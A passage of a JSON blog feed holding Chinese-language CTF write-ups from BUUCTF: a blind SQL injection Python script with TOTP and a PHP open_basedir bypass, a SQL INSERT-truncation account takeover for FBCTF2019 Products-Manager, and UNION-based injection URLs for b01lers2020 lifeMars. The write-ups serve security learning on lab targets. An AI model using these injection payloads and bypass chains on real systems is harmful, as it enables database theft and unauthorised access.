data-num=\"19\"></td><td><pre>        payload <span class=\"token operator\">=</span> <span class=\"token string\">\"login admin'/**/and/**/(ascii(substr((select/**/concat(password)/**/from/**/users),%d,1))/**/>/**/%d)and/**/'1 admin\"</span> <span class=\"token operator\">%</span> <span class=\"token punctuation\">(</span></pre></td></tr><tr><td data-num=\"20\"></td><td><pre>        i<span class=\"token punctuation\">,</span> mid<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"21\"></td><td><pre></pre></td></tr><tr><td data-num=\"22\"></td><td><pre>        params <span class=\"token operator\">=</span> <span class=\"token punctuation\">&#123;</span></pre></td></tr><tr><td data-num=\"23\"></td><td><pre>            <span class=\"token string\">\"a\"</span><span class=\"token punctuation\">:</span> payload<span class=\"token punctuation\">,</span></pre></td></tr><tr><td data-num=\"24\"></td><td><pre>            <span class=\"token string\">\"totp\"</span><span class=\"token punctuation\">:</span> totp<span class=\"token punctuation\">.</span>now<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"25\"></td><td><pre>        <span class=\"token punctuation\">&#125;</span></pre></td></tr><tr><td data-num=\"26\"></td><td><pre></pre></td></tr><tr><td data-num=\"27\"></td><td><pre>        r <span class=\"token operator\">=</span> requests<span class=\"token punctuation\">.</span>post<span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">,</span> params<span class=\"token operator\">=</span>params<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"28\"></td><td><pre>        <span class=\"token keyword\">if</span> <span class=\"token string\">\"password\"</span> <span class=\"token keyword\">in</span> r<span class=\"token punctuation\">.</span>text<span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"29\"></td><td><pre>            head <span class=\"token operator\">=</span> mid <span class=\"token operator\">+</span> <span class=\"token number\">1</span></pre></td></tr><tr><td data-num=\"30\"></td><td><pre>        <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"31\"></td><td><pre>            tail <span class=\"token operator\">=</span> mid</pre></td></tr><tr><td data-num=\"32\"></td><td><pre>    <span class=\"token keyword\">if</span> head <span class=\"token operator\">!=</span> <span class=\"token number\">32</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"33\"></td><td><pre>        name <span class=\"token operator\">+=</span> <span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span>head<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"34\"></td><td><pre>        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>name<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"35\"></td><td><pre>    <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"36\"></td><td><pre>        <span class=\"token keyword\">break</span></pre></td></tr></table></figure><p>基本就是绕过 open_basedir 设置：（但是 / 过滤了）chr (47) 代替</p>\n<pre><code>chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));\n</code></pre>\n<p>payload:</p>\n<figure class=\"highlight python\"><figcaption data-lang=\"python\"></figcaption><table><tr><td data-num=\"1\"></td><td><pre><span class=\"token keyword\">import</span> requests</pre></td></tr><tr><td data-num=\"2\"></td><td><pre><span class=\"token keyword\">import</span> pyotp</pre></td></tr><tr><td data-num=\"3\"></td><td><pre><span class=\"token keyword\">from</span> time <span class=\"token keyword\">import</span> sleep</pre></td></tr><tr><td data-num=\"4\"></td><td><pre><span class=\"token keyword\">import</span> re</pre></td></tr><tr><td data-num=\"5\"></td><td><pre></pre></td></tr><tr><td data-num=\"6\"></td><td><pre>url <span class=\"token operator\">=</span> <span class=\"token string\">\"http://80965cc9-78d4-4bec-83f6-ec550345fe26.node4.buuoj.cn:81/shell.php\"</span></pre></td></tr><tr><td data-num=\"7\"></td><td><pre>totp <span class=\"token operator\">=</span> pyotp<span class=\"token punctuation\">.</span>TOTP<span class=\"token punctuation\">(</span><span class=\"token string\">'GAXG24JTMZXGKZBU'</span><span class=\"token punctuation\">,</span> <span class=\"token number\">8</span><span class=\"token punctuation\">,</span> interval<span class=\"token operator\">=</span><span class=\"token number\">5</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"8\"></td><td><pre>name <span class=\"token operator\">=</span> <span class=\"token string\">\"\"</span></pre></td></tr><tr><td data-num=\"9\"></td><td><pre>i <span class=\"token operator\">=</span> <span class=\"token number\">0</span></pre></td></tr><tr><td data-num=\"10\"></td><td><pre><span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"11\"></td><td><pre>    sleep<span class=\"token punctuation\">(</span><span class=\"token number\">0.5</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"12\"></td><td><pre>    head <span class=\"token operator\">=</span> <span class=\"token number\">32</span></pre></td></tr><tr><td data-num=\"13\"></td><td><pre>    tail <span class=\"token operator\">=</span> <span class=\"token number\">127</span></pre></td></tr><tr><td data-num=\"14\"></td><td><pre>    i <span class=\"token operator\">+=</span> <span class=\"token number\">1</span></pre></td></tr><tr><td data-num=\"15\"></td><td><pre>    <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span>head <span class=\"token operator\">&lt;</span> tail<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"16\"></td><td><pre>        mid <span class=\"token operator\">=</span> head <span class=\"token operator\">+</span> tail <span class=\"token operator\">>></span> <span class=\"token number\">1</span></pre></td></tr><tr><td data-num=\"17\"></td><td><pre>        payload <span class=\"token operator\">=</span> <span class=\"token string\">\"login admin'/**/and/**/(ascii(substr((select/**/concat(password)/**/from/**/users),%d,1))/**/>/**/%d)and/**/'1 admin\"</span> <span class=\"token operator\">%</span> <span class=\"token punctuation\">(</span>i<span class=\"token punctuation\">,</span> mid<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"18\"></td><td><pre></pre></td></tr><tr><td data-num=\"19\"></td><td><pre>        params <span class=\"token operator\">=</span> <span class=\"token punctuation\">&#123;</span></pre></td></tr><tr><td data-num=\"20\"></td><td><pre>            <span class=\"token string\">\"a\"</span><span class=\"token punctuation\">:</span>payload<span class=\"token punctuation\">,</span></pre></td></tr><tr><td data-num=\"21\"></td><td><pre>            <span class=\"token string\">\"totp\"</span><span class=\"token punctuation\">:</span>totp<span class=\"token punctuation\">.</span>now<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"22\"></td><td><pre>        <span class=\"token punctuation\">&#125;</span></pre></td></tr><tr><td data-num=\"23\"></td><td><pre></pre></td></tr><tr><td data-num=\"24\"></td><td><pre>        r <span class=\"token operator\">=</span> requests<span class=\"token punctuation\">.</span>post<span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">,</span>params<span class=\"token operator\">=</span>params<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"25\"></td><td><pre>        <span class=\"token keyword\">if</span> <span class=\"token string\">\"password\"</span> <span class=\"token keyword\">in</span> r<span class=\"token punctuation\">.</span>text<span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"26\"></td><td><pre>            head <span class=\"token operator\">=</span> mid <span class=\"token operator\">+</span> <span class=\"token number\">1</span></pre></td></tr><tr><td data-num=\"27\"></td><td><pre>        <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"28\"></td><td><pre>            tail <span class=\"token operator\">=</span> mid</pre></td></tr><tr><td data-num=\"29\"></td><td><pre>    <span class=\"token keyword\">if</span> head <span class=\"token operator\">!=</span> <span class=\"token number\">32</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"30\"></td><td><pre>        name <span class=\"token operator\">+=</span> <span class=\"token builtin\">chr</span><span class=\"token punctuation\">(</span>head<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"31\"></td><td><pre>        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>name<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"32\"></td><td><pre>    <span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"33\"></td><td><pre>        <span class=\"token keyword\">break</span></pre></td></tr><tr><td data-num=\"34\"></td><td><pre></pre></td></tr><tr><td data-num=\"35\"></td><td><pre>session <span class=\"token operator\">=</span> requests<span class=\"token punctuation\">.</span>session<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"36\"></td><td><pre></pre></td></tr><tr><td data-num=\"37\"></td><td><pre><span class=\"token keyword\">def</span> <span class=\"token function\">login</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"38\"></td><td><pre>    sleep<span class=\"token punctuation\">(</span><span class=\"token number\">0.5</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"39\"></td><td><pre>    r <span class=\"token operator\">=</span> session<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">,</span>params<span class=\"token operator\">=</span><span class=\"token punctuation\">&#123;</span><span class=\"token string\">'a'</span><span class=\"token punctuation\">:</span> <span class=\"token string\">'login admin '</span><span class=\"token operator\">+</span> name<span class=\"token punctuation\">,</span> <span class=\"token string\">'totp'</span><span class=\"token punctuation\">:</span> totp<span class=\"token punctuation\">.</span>now<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">&#125;</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"40\"></td><td><pre></pre></td></tr><tr><td data-num=\"41\"></td><td><pre><span class=\"token keyword\">def</span> <span class=\"token function\">destruct</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"42\"></td><td><pre>    sleep<span class=\"token punctuation\">(</span><span class=\"token number\">0.5</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"43\"></td><td><pre>    r <span class=\"token operator\">=</span> session<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">,</span> params<span class=\"token operator\">=</span><span class=\"token punctuation\">&#123;</span><span class=\"token string\">'a'</span><span class=\"token punctuation\">:</span> <span class=\"token string\">'destruct'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'totp'</span><span class=\"token punctuation\">:</span> totp<span class=\"token punctuation\">.</span>now<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">&#125;</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"44\"></td><td><pre></pre></td></tr><tr><td data-num=\"45\"></td><td><pre><span class=\"token keyword\">def</span> <span class=\"token function\">targeting</span><span class=\"token punctuation\">(</span>code<span class=\"token punctuation\">,</span> position<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"46\"></td><td><pre>    sleep<span class=\"token punctuation\">(</span><span class=\"token number\">0.5</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"47\"></td><td><pre>    r <span class=\"token operator\">=</span> session<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">,</span> params<span class=\"token operator\">=</span><span class=\"token punctuation\">&#123;</span><span class=\"token string\">'a'</span><span class=\"token punctuation\">:</span> <span class=\"token string\">'targeting '</span> <span class=\"token operator\">+</span> code <span class=\"token operator\">+</span> <span class=\"token string\">' '</span> <span class=\"token operator\">+</span> position<span class=\"token punctuation\">,</span> <span class=\"token string\">'totp'</span><span class=\"token punctuation\">:</span> totp<span class=\"token punctuation\">.</span>now<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">&#125;</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"48\"></td><td><pre>    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"code: \"</span> <span class=\"token operator\">+</span> code <span class=\"token operator\">+</span> <span class=\"token string\">\"  \"</span> <span class=\"token operator\">+</span> <span class=\"token string\">\"position: \"</span> <span class=\"token operator\">+</span> position<span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"49\"></td><td><pre></pre></td></tr><tr><td data-num=\"50\"></td><td><pre><span class=\"token keyword\">def</span> <span class=\"token function\">launch</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"51\"></td><td><pre>    sleep<span class=\"token punctuation\">(</span><span class=\"token number\">0.5</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"52\"></td><td><pre>    r <span class=\"token operator\">=</span> session<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span>url<span class=\"token punctuation\">,</span> params<span class=\"token operator\">=</span><span class=\"token punctuation\">&#123;</span><span class=\"token string\">'a'</span><span class=\"token punctuation\">:</span> <span class=\"token string\">'launch'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'totp'</span><span class=\"token punctuation\">:</span> totp<span class=\"token punctuation\">.</span>now<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">&#125;</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"53\"></td><td><pre>    <span class=\"token keyword\">return</span> r<span class=\"token punctuation\">.</span>text</pre></td></tr><tr><td data-num=\"54\"></td><td><pre></pre></td></tr><tr><td data-num=\"55\"></td><td><pre><span class=\"token keyword\">def</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"56\"></td><td><pre>    login<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"57\"></td><td><pre>    destruct<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"58\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"a\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"chdir\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"59\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"b\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"img\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"60\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"c\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"&#123;$a($b)&#125;\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"61\"></td><td><pre></pre></td></tr><tr><td data-num=\"62\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"d\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"ini_set\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"63\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"e\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"open_basedir\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"64\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"f\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"..\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"65\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"g\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"&#123;$d($e,$f)&#125;\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"66\"></td><td><pre></pre></td></tr><tr><td data-num=\"67\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"h\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"&#123;$a($f)&#125;\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"68\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"i\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"&#123;$a($f)&#125;\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"69\"></td><td><pre></pre></td></tr><tr><td data-num=\"70\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"j\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"chr\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"71\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"k\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"&#123;$j(47)&#125;\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"72\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"l\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"&#123;$d($e,$k)&#125;\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"73\"></td><td><pre></pre></td></tr><tr><td data-num=\"74\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"m\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"flag\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"75\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"n\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"file_get\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"76\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"o\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"_contents\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"77\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"p\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"$n$o\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"78\"></td><td><pre></pre></td></tr><tr><td data-num=\"79\"></td><td><pre>    targeting<span class=\"token punctuation\">(</span><span class=\"token string\">\"q\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"&#123;$p($m)&#125;\"</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"80\"></td><td><pre></pre></td></tr><tr><td data-num=\"81\"></td><td><pre>    <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>re<span class=\"token punctuation\">.</span>search<span class=\"token punctuation\">(</span><span class=\"token string\">\"flag&#123;.*&#125;\"</span><span class=\"token punctuation\">,</span> launch<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>group<span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span><span class=\"token number\">42</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span></pre></td></tr><tr><td data-num=\"82\"></td><td><pre></pre></td></tr><tr><td data-num=\"83\"></td><td><pre></pre></td></tr><tr><td data-num=\"84\"></td><td><pre><span class=\"token keyword\">if</span> __name__ <span class=\"token operator\">==</span> <span class=\"token string\">'__main__'</span><span class=\"token punctuation\">:</span></pre></td></tr><tr><td data-num=\"85\"></td><td><pre>    main<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></pre></td></tr></table></figure><p>targeting 是赋值命令，launch 命令是为了执行命令，destruct 命令用来断开连接</p>\n<p>参考连接：</p>\n<p><span class=\"exturl\" data-url=\"aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NoaW55Z29kL2FydGljbGUvZGV0YWlscy8xMjQ1ODY1NDI=\">https://blog.csdn.net/shinygod/article/details/124586542</span></p>\n<p><span class=\"exturl\" data-url=\"aHR0cHM6Ly93d3cuemhhb2ouaW4vcmVhZC02MTcwLmh0bWwjMHgwM0dpZnRib3g=\">glzjin</span></p>\n",
            "tags": [
                "buuctf",
                "sql注入",
                "php绕过open_opedir设置",
                "TOTP"
            ]
        },
        {
            "id": "http://odiws.github.io/2024/11/18/FBCTF2019-Products-Manager/",
            "url": "http://odiws.github.io/2024/11/18/FBCTF2019-Products-Manager/",
            "title": "[FBCTF2019]Products-Manager",
            "date_published": "2024-11-18T12:37:39.000Z",
            "content_html": "<h2 id=\"fbctf2019products-manager\"><a class=\"markdownIt-Anchor\" href=\"#fbctf2019products-manager\">#</a> [FBCTF2019]Products-Manager</h2>\n<p>考点：</p>\n<ol>\n<li>基于约束的 SQL 攻击</li>\n<li>数据库字符串比较</li>\n<li>INSERT 截断</li>\n</ol>\n<p><img data-src=\"https://zty--666.oss-cn-shanghai.aliyuncs.com/202411182038091.png\" alt=\"image-20241118203842900\"></p>\n<p>给了源码，分析一下的话，footer.php 没有东西，index.php 也差不多</p>\n<p>但是 db.php 里面的：</p>\n<pre><code class=\"language-mysql\">/*\nCREATE TABLE products (\n  name char(64),\n  secret char(64),\n  description varchar(250)\n);\n\nINSERT INTO products VALUES('facebook', sha256(....), 'FLAG_HERE');\nINSERT INTO products VALUES('messenger', sha256(....), ....);\nINSERT INTO products VALUES('instagram', sha256(....), ....);\nINSERT INTO products VALUES('whatsapp', sha256(....), ....);\nINSERT INTO products VALUES('oculus-rift', sha256(....), ....);\n*/\n</code></pre>\n<p>SQL 语言，有一些插入的数据，可以发现 flag 在 facebook 里面，那基本上就是用一些手段讲 facebook 的密码套出来，或是直接修改</p>\n<p>知识点：</p>\n<h4 id=\"1数据库字符串比较\"><a class=\"markdownIt-Anchor\" href=\"#1数据库字符串比较\">#</a> <strong>1. 数据库字符串比较</strong></h4>\n<p>在数据库对字符串进行比较时，如果两个字符串的长度不一样，则会将较短的字符串末尾填充空格，使两个字符串的长度一致，比如，字符串 A:[String] 和字符串 B:[String2] 进行比较时，由于 String2 比 String 多了一个字符串，这时 MySQL 会将字符串 A 填充为 [String ]，即在原来字符串后面加了一个空格，使两个字符串长度一致。</p>\n<p>如下两条查询语句：</p>\n<p>select * from users where username=‘Dumb’</p>\n<p>select * from users where username='Dumb ’</p>\n<p>它们的查询结果是一致的，即第二条查询语句中 Dumb 后面的空格并没有对查询有任何影响。因为在 MySQL 把查询语句里的 username 和数据库里的 username 值进行比较时，它们就是一个字符串的比较操作，符合上述特征。</p>\n<h4 id=\"2-insert截断\"><a class=\"markdownIt-Anchor\" href=\"#2-insert截断\">#</a> <strong>2. INSERT 截断</strong></h4>\n<p>这是数据库的另一个特性，当设计一个字段时，我们都必须对其设定一个最大长度，比如 CHAR (10)，VARCHAR (20) 等等。但是当实际插入数据的长度超过限制时，数据库就会将其进行截断，只保留限定的长度。</p>\n<p>这里已经知道了那个定义的长度 64，我可以用</p>\n<pre><code>facebook                                                                                                123     \n</code></pre>\n<p>注册一个，insert 会截断 64 位（空格也算）之后的字符，但是空格又会在比较时自动对齐，就不用理会</p>\n<p><img data-src=\"https://zty--666.oss-cn-shanghai.aliyuncs.com/202411182046419.png\" alt=\"image-20241118204624151\"></p>\n",
            "tags": [
                "buuctf",
                "sql注入",
                "insert截断"
            ]
        },
        {
            "id": "http://odiws.github.io/2024/06/20/Mars/",
            "url": "http://odiws.github.io/2024/06/20/Mars/",
            "title": "[b01lers2020]lifeMars",
            "date_published": "2024-06-20T12:21:48.000Z",
            "content_html": "<p><img data-src=\"../images/%5Bb01lers2020%5DLifeOnMars/2.png\" alt=\"2\"></p>\n<p>进来是这样的场景：用 f12 进入网络发现有些一样的传参：</p>\n<p><img data-src=\"../images/%5Bb01lers2020%5DLifeOnMars/3.png\" alt=\"3\"></p>\n<p>发现有个 search 的传参：（结合源码（ctrl+u）发现有个 life on mars 这个文件）</p>\n<pre><code>life on mars.js\n\nfunction get_life(query) &#123;\n  $.ajax(&#123;\n    type: &quot;GET&quot;,\n    url: &quot;/query?search=&quot; + query,\n    data: &quot;&#123;&#125;&quot;,\n    contentType: &quot;application/json; charset=utf-8&quot;,\n    dataType: &quot;json&quot;,\n    cache: false,\n    success: function(data) &#123;\n      var table_html =\n        '&lt;table id=&quot;results&quot;&gt;&lt;tr&gt;&lt;th&gt;Name&lt;/th&gt;&lt;th&gt;Description&lt;/th&gt;&lt;/tr&gt;';\n      $.each(data, function(i, item) &#123;\n        table_html +=\n          &quot;&lt;tr&gt;&lt;td&gt;&quot; + data[i][0] + &quot;&lt;/td&gt;&lt;td&gt;&quot; + data[i][1] + &quot;&lt;/td&gt;&lt;/tr&gt;&quot;;\n      &#125;);\n      table_html += &quot;&lt;/table&gt;&quot;;\n\n      $(&quot;#results&quot;).replaceWith(table_html);\n    &#125;,\n\n    error: function(msg) &#123; &#125;\n  &#125;);\n&#125;\n</code></pre>\n<p>该 js 文件返回的是数据集，那么这里一定查询了数据库，那么就可能存在<span class=\"exturl\" data-url=\"aHR0cHM6Ly9zby5jc2RuLm5ldC9zby9zZWFyY2g/cT1zcWwlRTYlQjMlQTglRTUlODUlQTUlRTYlQkMlOEYlRTYlQjQlOUUmYW1wO3NwbT0xMDAxLjIxMDEuMzAwMS43MDIw\"> sql 注入漏洞</span>。那就开始 sql 注入的流程。</p>\n<p><code>/query?search=</code>  如果地名输入正确，发现返回如下:</p>\n<p><img data-src=\"../images/%5Bb01lers2020%5DLifeOnMars/4.png\" alt=\"4\"></p>\n<p>开始 SQL 注入：</p>\n<pre><code>有几个字段：http://101a498c-ce4a-4364-9799-d9bdb1912f43.node5.buuoj.cn:81/query?search=hesperia_planum order by 2\n查询数据库名称：http://101a498c-ce4a-4364-9799-d9bdb1912f43.node5.buuoj.cn:81/query?search=hesperia_planum union select 1,database()\n查询数据表：http://101a498c-ce4a-4364-9799-d9bdb1912f43.node5.buuoj.cn:81/query?search=hesperia_planum union select 1,(SELECT%20group_concat(table_name)%20FROM%20information_schema.tables%20%20WHERE%20table_schema%20=%20%27aliens%27)\n</code></pre>\n<p>到这里就搞不出来了：然后就是</p>\n<h4 id=\"查询所有的数据库\"><a class=\"markdownIt-Anchor\" href=\"#查询所有的数据库\">#</a> 查询所有的数据库</h4>\n<p>在这个查询中，information_schema.schemata 是一个 MySQL 系统表，其中包含所有数据库的信息。执行这个查询后，MySQL 将返回一个包含所有数据库名称的结果集。</p>\n<p>这些命令和查询可以在 MySQL 命令行界面中使用，也可以在 MySQL 客户端或其他数据库工具中使用。</p>\n<p><span class=\"exturl\" data-url=\"aHR0cDovLzEwMWE0OThjLWNlNGEtNDM2NC05Nzk5LWQ5YmRiMTkxMmY0My5ub2RlNS5idXVvai5jbjo4MS9xdWVyeT9zZWFyY2g9aGVzcGVyaWFfcGxhbnVtJTIwdW5pb24lMjBzZWxlY3QlMjAxLChTRUxFQ1QlMjBncm91cF9jb25jYXQoc2NoZW1hX25hbWUpJTIwRlJPTSUyMGluZm9ybWF0aW9uX3NjaGVtYS5zY2hlbWF0YQ==\">http://101a498c-ce4a-4364-9799-d9bdb1912f43.node5.buuoj.cn:81/query?search=hesperia_planum union select 1,(SELECT group_concat(schema_name) FROM information_schema.schemata</span>)</p>\n<p>还可以：（直接用 sqlmap）：</p>\n<p><img data-src=\"../images/%5Bb01lers2020%5DLifeOnMars/1.png\" alt=\"1\"></p>\n<p>爆出还有一个 alien_code 这个库：（重复上个的操作）</p>\n<p>或者可以：</p>\n<p><img data-src=\"../images/%5Bb01lers2020%5DLifeOnMars/5.png\" alt=\"5\"></p>\n<p>直接有字段名了：</p>\n<p>没有直接给出就手打：</p>\n<pre><code>http://101a498c-ce4a-4364-9799-d9bdb1912f43.node5.buuoj.cn:81/query?search=amazonis_planitia%20union%20select%20group_concat(id),group_concat(code)%20from%20alien_code.code\n</code></pre>\n<p>完成，获得 flag</p>\n",
            "tags": [
                "buuctf",
                "sql注入",
                "信息搜集（js，网络）"
            ]
        }
    ]
}